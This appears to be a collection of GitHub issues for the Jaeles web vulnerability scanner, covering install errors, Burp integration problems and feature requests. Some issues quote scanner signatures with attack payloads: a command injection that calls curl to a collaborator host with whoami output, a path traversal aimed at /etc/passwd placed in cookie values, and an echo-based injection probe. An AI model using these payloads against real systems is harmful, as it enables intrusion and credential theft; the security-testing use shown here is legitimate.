github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

What should i do ?

Command used :
(1) jaeles server --verbose
(2) The JWT Token has been saved in ~/.jaeles-burp/config.json.
(3) Login UI with the creds.

Procedure to produce :
When pressing the "Test Connection" button in Burp Suite Community Edition, the jaeles server produced "401" error. Meanwhile, the "Send to Endpoint" does not work too.

error:

Jaeles Loaded ...
[+] Ready to send request to http://127.0.0.1:5000/api/parse
Import to external Jaeles ...
<urllib2.Request instance at 0x4>
[+] Send request to http://127.0.0.1:5000/api/parse

Import to external Jaeles ...
<urllib2.Request instance at 0x6>

why ?

thanks @j3ssie

Thank you for this awesome project at first!

I recently used Jaeles with the burp plugin, so I started Jaeles in server mode.
Unfortunately, I have noticed that when supplying an additional value of a parameter defined in a signature, it wont be replaced by the Jaeles API.

For example, my parameter in the signature looks as follows:

variables:
  - dest: |
        example.com

I call Jaeles like :

jaeles server -v -s "my-signature.yaml" -p 'dest=xxx.burpcollaborator.net' --proxy http://127.0.0.1:8080

Following test payload is in the signature:

payloads:
  - '\"curl http://{{.dest}}/.testing/?vuln=16?user=\\\`whoami\\\`\"'

But when observing the requests Jaeles makes through burp, I see that the parameter value of "dest" is not replaced with "xxx.burpcollaborator.net".
It still sets the value as initially defined:

...http://example.com/.testing/?vuln=16?user=...

First all i ❤❤❤ your tools man.

When generating output in html it would be nice to view the file in the browser other than it downloading since it has no file extension.

When I try to use Generator with some headers, the payload don't work. For example:

# info to search robots.txt
id: test
type: fuzz
info:
  name: Robots
  risk: Low


payloads:
  - 'robots.txt'
  - 'teste'
    

requests:
  - generators:
      - Header("{{.payload}}", "Arbitraty")

When I use this template, the jaeles will send 2 requests using the header "Arbitraty" but with the same payload, which is the last payload that I set (in this case: teste)

However, if I change the Arbitraty word for Referer, it will work normally. This problem doesn't occurs only with some headers.

Hello, I would like to know how to add a new signature manually since through the UI a 404 error returns, please and thank you

Hello, I would like to ask, how to do scan on a web app that requires login/ authentication?
BTW, its Laravel 8/ 9 web app.
Thank you.

Web UI doesn't start, gives error,

{"code":401,"message":"cookie token is empty"}

Trying to execute the CLI:

$ jaeles scan -u https://localhost:8080

[Error] No signature loaded

Prior to execution, jaeles config -a init and -a update were ran to ensure signatures were available.

Is there something else to do?

Thanks!

Hello, scanning the same host name will repeat the scan, hoping to have a logo, otherwise it will be rescanned every time.

Getting this error while running any command :

Can't connect to DB at /root/.jaeles/sqlite3.db

Please, add HTTP/2 Support requests

Hi. When compiling the latest version of the code, I get the following error:

# github.com/appleboy/gin-jwt
src/github.com/appleboy/gin-jwt/auth_jwt.go:457:14: not enough arguments in call to c.SetCookie
        have (string, string, int, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:475:14: not enough arguments in call to c.SetCookie
        have (string, string, number, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:540:14: not enough arguments in call to c.SetCookie
        have (string, string, int, string, string, bool, bool)
        want (string, string, int, string, string, http.SameSite, bool, bool)

It seems related to this issue in the gin-jwt project: appleboy/gin-jwt#230. Some users have solved the issue by implementing go modules.

Regards.

Command:
./jaeles scan -s templates/ -u http://testphp.vulnweb.com/listproducts.php?cat=2 -c 50 --no-db

Error (if using --no-db):

Jaeles beta v0.14 by @j3ssiejjj
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xb0 pc=0xc4a966]

goroutine 1 [running]:
github.com/jinzhu/gorm.(*DB).clone(0x0, 0x4ebfa4)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:853 +0x26
github.com/jinzhu/gorm.(*DB).NewScope(0x0, 0x111fb20, 0xc00012c000, 0xc0004182d0)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:204 +0x2f
github.com/jinzhu/gorm.(*DB).Create(0x0, 0x111fb20, 0xc00012c000, 0x1)
	/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:482 +0x43
github.com/jaeles-project/jaeles/database.NewScan(0xc0004cc7e0, 0x12, 0x13435a3, 0x1a, 0xc0004ccac0, 0x1b, 0xc0004ccae0, 0x1c, 0xc0004ccb00, 0x1d, ...)
	/go/src/github.com/jaeles-project/jaeles/database/scan.go:37 +0x33e
github.com/jaeles-project/jaeles/cmd.SelectSign()
	/go/src/github.com/jaeles-project/jaeles/cmd/root.go:198 +0x46a
github.com/jaeles-project/jaeles/cmd.runScan(0xc000470580, 0xc0004040e0, 0x0, 0x7, 0x0, 0x0)
	/go/src/github.com/jaeles-project/jaeles/cmd/scan.go:36 +0x42
github.com/spf13/cobra.(*Command).execute(0xc000470580, 0xc000404070, 0x7, 0x7, 0xc000470580, 0xc000404070)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:842 +0x460
github.com/spf13/cobra.(*Command).ExecuteC(0x1fbff40, 0x44813a, 0x1fd5680, 0xc000000180)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:950 +0x349
github.com/spf13/cobra.(*Command).Execute(...)
	/go/pkg/mod/github.com/spf13/[email protected]/command.go:887
github.com/jaeles-project/jaeles/cmd.Execute()
	/go/src/github.com/jaeles-project/jaeles/cmd/root.go:33 +0x31
main.main()
	/go/src/github.com/jaeles-project/jaeles/main.go:6 +0x20

I'm getting installation error
root@wind:~# go install github.com/jaeles-project/jaeles@latest

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

Actually This Tool Is So Great , But In type: fuzz There Is One Feature Missing
It Is Fuzz Cookie Header , This Tool Give Us To Replace Value Of Header Name But Let e.g.
Cookie Header Of The Origin Request Like This
Cookie: session=1; id=22; lang=en
So It Is Possible To Fuzz Cookie Here Like Fuzzing Body e.g. Can You Add Something Like That

id: Cookie-Fuzz
info:
  name: Fuzz Cookie Headers
  risk: Critical
type: fuzz
payloads:
  - '../../../../etc/passwd'
requests:
  - generators:
       - Header-Fuzz("{{.payload}}", "Cookie")

So Here Header-Fuzz Generate Three Requests
Cookie: session=../../../../etc/passwd; id=22; lang=en
Cookie: session=1; id=../../../../etc/passwd; lang=en
Cookie: session=1; id=22; lang=../../../../etc/passwd
So Can This Happen ?

Hello, what is the syntax to use raw request option?

jaeles scan -r request.txt ?

Jaeles has a lot of feature but one feature is missing that is connecting many template like nuclei. I use nuclei only for that feature. But I really love it jaeles has that same feature too

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

I use the jaeles as the following command ;-
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2 --proxy http://127.0.0.1:8080
IMMEDIATELY CPU SPIKES TO 100% after this and my pc fan running like a helicopter
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2
It also cause the CPU spikes to 100% later on and keep it not less than 50 % while the scan running . And further there was not any more internet connection in my home router. To have the connection again I have to end the process of jaeles and restart my router.
First problem I need helps if possible.
For connection problem it will solve if there is an option to add resolver files of flag like -r resolvers.txt as well the rate limit hopefully. jaeles is a very nice tool and always thanks for providing it.

Hello @j3ssie howare you?
Today I try test with my signature for xss

• Signature

https://github.com/ghsec/ghsec-jaeles-signatures/blob/master/Dom-xss.yaml

• Error with --debug - Output

[0006] DEBUG Detection: HasPopUp() -- false
[0006] ERROR chrome failed to start:
[46504:46504:0312/231756.623137:ERROR:content_main_runner_impl.cc(325)] --no-sandbox should be used together with --no--zygote

What's wrong? is this error jaeles or chrome?

Add an -pbar option similar to nuclei to show the total number of packets being sent

As we can see in the docs:

Header() and Body() have same usage of Query() generator.

- Query("{{.payload}}", "{{.name}}") works fine, but
- Body("{{.payload}}", "{{.name}}") just ignored.
I tried to set the method to POST, but anyways it doesn't work
My config is -

id: ci-fuzz-01
info:
  name: Command Injection Reflection
  risk: High
payloads:
- 'echo TJEGSE$((2314+6548321))$(echo TJEGSE)TJEGSE' 
requests:
- detections:
  - StringSearch("response", "6550635") && (StringCount("response", "6550635") > StringCount("oresponse",
    "6550635"))
  generators:
  - Body("{{.payload}}", "{{.name}}")
type: fuzz
variables:
- name: 'cmd

'

Hi ,

I tried installing via burp plugin I am getting this error. The server is running but when I send request via burp to scan in jaeles server endpoint this is the error shown. Please advice at the earliest.

Send the request from burp to Jaeles. And use jaeles to brute force password or fuzz directories.

Why we need to do that?

1. Since jaeles is written in go, it will be faster
2. Burp intruder cant manage large file such as rockyou.txt for brute forcing , the burp will be crashed.(In my vm :( . dont know about other system)

Hello, web ui can not add vulnerability scanning plugin, because api returns 404, I hope to add more poc with you

Hey Guys,

Been playing with jaeles for a few days now and this is what I did to get it to work:

1. download one of the pre-compiled binaries, they worked straight away for me. Add it to your path and you good to go. If you need to install it use the GO111MODULE=on go install github.com/jaeles-project/jaeles@latest, the binary is inside the go folder. I have not tested this so unsure how it works.
2. When using your own signatures, use the full path
3. if for whatever reason when you do the jaeles config init you get an error, delete the folder .jaeles and try again, you should se the signatures being downloaded
4. when sending request from burp, make sure you edit it on responder before sending it. I would also advice to test the signatures on your test server before doing any scans to an operational server.

Otherwise, the tool seems to work like charm. I hope this helps.

i see the "My introduction slide about Jaeles" link , but its not found.

Pls help me with , how to get started with this.

Apologies for opening a new issue, but the previous one #12 was closed before I had a chance to test the changes.

After pulling the new Jaeles and running a config -a update, still says "No signatures loaded".

Is there a specific directory or environment in which Jaeles should be run? For some reason it's not locating signatures when running a simple scan command.

I did by
jaeles report -o mysavedscanfolder

But it does Nothing to save `

Step 1 install jaeles

wget https://github.com/jaeles-project/jaeles/releases/download/beta-v0.17/jaeles-v0.17-darwin.zip
unzip jaeles-v0.17-darwin.zip

Step 2 reload. signatures

git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures ./jaeles-signatures/
./jaeles config -a reload --signDir ./jaeles-signatures/

Step 3. start server

./jaeles server

Step 4 jwt token

POST /auth/login HTTP/1.1
Content-Type: application/json
User-Agent: Jaeles Scanner
Host: 127.0.0.1:5000
Content-Length: 54
Connection: close

{
    "username": "jaeles",
    "password": "your_password_here"
}

Step 5 install Burp plugin

https://github.com/jaeles-project/jaeles-plugins

refer. https://jaeles-project.github.io/installation/burp-integration/

Hi,
Jaeles is most powerful tool, I love it. But can I use burp collaborator in script. Like BurpBounty Burp plugin do. Is there anyway I can give {BC} and it replace by burp collaborator address?

I am installing jaeles in VPS and facing error when installing using GO. I run go install github.com/jaeles-project/jaeles@latest
and getting following error after some installation.

github.com/mattn/go-sqlite3

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~

I tried:

go install github.com/jaeles-project/jaeles@latest

and it failed with error:

sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 |   return pNew;
       |          ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 |   Select standin;
       |          ^~~~~~~

then I tried:

GO111MODULE=on go install github.com/jaeles-project/jaeles@latest

and I got the same error.

I tried the docker image but is not working, tried to get a shell into it to try to fix the docker image but bin/bash is not present. anyone knows how to successfully install Jaeles? am I missing something?

the only ones that are working are the pre-compiled versions.

Hi

I'm finding only "info" level vulns, probably due to the lack of a rate-limiting feature to throttle the number of requests per second. Is there an option to do this that I may not have perceived yet?

Regards

can you also add option to add resolvers file

The repeat option on yaml template is not working. I tried to repeat the request and no success

After the basic signature is scanned, jaeles does not stop running or print the vulnerability results of the scan, but still sending just four packets of HEAD, POST, GET, PATCH, the requested url is the same, just like DDOS .
I have executed reload --signDir jaeles-signatures, the command used when scanning is
./jaeles-v0.9 scan -u https://seaii-blog.com -v.
My operating system is osx.

Here is the screenshot attached an error occurred while installing Jaeles through go command.

GO111MODULE=on go get github.com/jaeles-project/jaeles

I am getting error on running
λ jaeles scan -u http://brutelogic.com.br/xss.php -s Dom-xss.yaml

test rule:

id: test
info:
  name: Test 
  risk: Critical
type: fuzz

payloads:
    - 'test'

requests:
  - generators:
      - Query("[[.original]]{{.payload}}")
    detections:
      - OriginResponseTime() > 0

jaeles scan -s test.yaml -u https://example.com\?param\=1 -v --debug
Jaeles beta v0.7 by @j3ssiejjj
[0000]  INFO Load config from: /root/.jaeles/config.yaml
[0000]  INFO Summary output: out/jaeles-summary.txt
[0000]  INFO Signatures Loaded: 1
[0000]  INFO Signature Loaded: test.yaml
[0000]  INFO Start Scan with ID: 61343531626561382d376436302d313165612d613733392d393630303030313263303833
[0000]  INFO Input Loaded: 1
[0000] DEBUG Checking backround task
[0000] DEBUG Generator: Query("[[.original]]test")
[0000] DEBUG injectedString: [[.original]]test
[0000] DEBUG paramName: undefined
[0000] DEBUG New Parsed Reuqest: 1
[Sent] GET https://example.com?param=1test 200 OK HTTP/1.1 0.42473274
[0000] DEBUG Detection: OriginResponseTime() > 0

Hello,

I might have missed something but it looks like we can't modify the original parameters names by using generators.

For example: What I would like to automate:
hxxps://test.com/index.php?test1=aaa&test2=aaaa -> hxxps://test.com/index.php?test1[]=aaa&test2[]=aaaa

Did I missed something or this would be an awesome functionnality to add ? 😁

Regards,

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:

• https://inventory.rawsec.ml/tools.html#Jaeles

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

Hello is posible to mount the web UI and the rest in a web-server and pass the burpsuite traffic from my machine?